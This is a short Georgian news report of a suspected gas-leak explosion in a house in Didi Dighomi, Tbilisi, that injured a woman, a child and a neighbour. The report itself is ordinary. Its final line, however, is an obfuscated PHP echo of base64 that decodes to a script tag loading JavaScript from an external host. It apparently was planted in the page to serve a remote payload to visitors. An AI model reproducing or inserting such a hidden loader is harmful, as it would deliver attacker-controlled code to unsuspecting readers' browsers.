celsiusi
ავერსი შნაიდერი
არსებული ინფორმაციით, დიდ დიღომში, ბენდუქიძის დასახლებაში მომხდარი აფეთქების მიზეზი, სავარაუდოდ, საცხოვრებელ სახლში დამონტაჟებული წყლის გამაცხელებლიდან ბუნებრივი აირის გაჟონვა გახდა. შემთხვევის გამომწვევი ზუსტი მიზეზის დასადგენად ადგილზე შინაგან საქმეთა სამინისტროს და გაზის კომპანია შპს “დიდი დიღმის” თანამშრომლები მუშაობენ.
 
გაზის კომპანიის წარმომადგენლებს ოფიციალური კომენტარი ამ დრომდე არ გაუკეთებიათ.
 
შემთხვევა დღეს გამთენიისას მოხდა. დაშავებულები ნიგერიის მოქალაქე ქალი და ბავშვი არიან. ასევე დაშავებულია მამაკაცი, ის ადგილობრივების ინფორმაციით, აფეთქების დროს გვერდზე სახლში იმყოფებოდა.
 
დაშავებულები საავადმყოფოში არიან გადაყვანილები.
 
ფოტო: on.ge 
496
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");